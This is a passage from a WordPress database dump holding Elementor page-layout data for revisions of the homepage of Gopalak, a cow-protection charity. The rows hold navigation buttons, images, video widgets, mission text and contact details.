here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9758,1642,'_elementor_page_assets','a:0:{}'),(9759,1643,'_elementor_edit_mode','builder'),(9760,1643,'_elementor_template_type','wp-page'),(9761,1643,'_elementor_version','3.7.8'),(9762,1643,'_wp_page_template','elementor_canvas'),(9763,1643,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9764,1643,'_elementor_page_assets','a:0:{}'),(9765,1644,'_elementor_edit_mode','builder'),(9766,1644,'_elementor_template_type','wp-page'),(9767,1644,'_elementor_version','3.7.8'),(9768,1644,'_wp_page_template','elementor_canvas'),(9769,1644,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\